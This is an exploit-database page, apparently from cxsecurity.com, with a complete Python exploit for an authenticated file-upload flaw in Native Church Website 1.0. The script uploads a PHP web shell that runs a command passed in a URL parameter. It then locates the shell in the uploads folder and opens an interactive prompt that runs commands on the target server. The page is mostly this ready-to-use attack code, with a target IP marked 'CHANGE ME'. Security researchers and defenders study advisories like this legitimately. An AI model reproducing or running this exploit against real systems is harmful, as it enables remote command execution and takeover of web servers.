Native Church Website 1.0 Shell Upload

2021.04.13
Credit: Richard Jones
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Native Church Website - Arbitrary File Upload (Authenticated) # Date: 04/21 # Exploit Author: Richard Jones # Vendor Homepage: https://www.sourcecodester.com/php/11764/native-church-website-phpmysql.html # Version: 1.0 # Tested on: Windows 10 build 19041 + xampp 3.2.4 #/usr/bin/python3 import requests import re from requests.models import ReadTimeoutError import sys s = requests.Session() TARGET = "192.168.1.207" # <<< CHANGE ME UPLOADS_URL = f"http://{TARGET}/native/admin/save-photo.php" GALLERY_URL = f"http://{TARGET}/native/uploads/" def get(url): r = s.get(url) return r.text def banner(): ban = """ _______ __ __ \ \ ____/ \ / \ ______ ______ / | \_/ ___\ \/\/ / \____ \/ ___/ / | \ \___\ / | |_> >___ \ \____|__ /\___ >\__/\ / /\ | __/____ > \/ \/ \/ \/ |__| \/ """ return ban def uploadShell(): data = ( ('file', ("file.php", "<?php system($_GET['c']);?>")), ('caption', (None, 'simprevshell')), ) r = s.post(UPLOADS_URL, files=data) if r.status_code == 200: return True else: return False def getLink(page): matchObj = re.findall("href=\"(.*?).php\"", page) return matchObj def testURL(url): r = s.get(url) return r.status_code def getUploadLink(uploads): if len(NEW_UPLOADS) > 1: for l in NEW_UPLOADS: link = f"{GALLERY_URL}{l}.php" if testURL(link) == 200: return link uploadShell() # Get upload link. NEW_UPLOADS=getLink(get(GALLERY_URL)) shellUrl = getUploadLink(NEW_UPLOADS) print("\033[34;1m" + banner() + "\033[0m") print("\033[37m" + "Created by: Richard Jones aka Ac1d" +"\033[0m") #Run webshell. while True: print() try: cmd = input("\033[91mac1d\033[0m>") if cmd == "exit": sys.exit() r = s.get(f"{shellUrl}?c={cmd}", verify=False) if r.status_code == 200: print(r.text) else: raise Exception except KeyboardInterrupt: sys.exit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top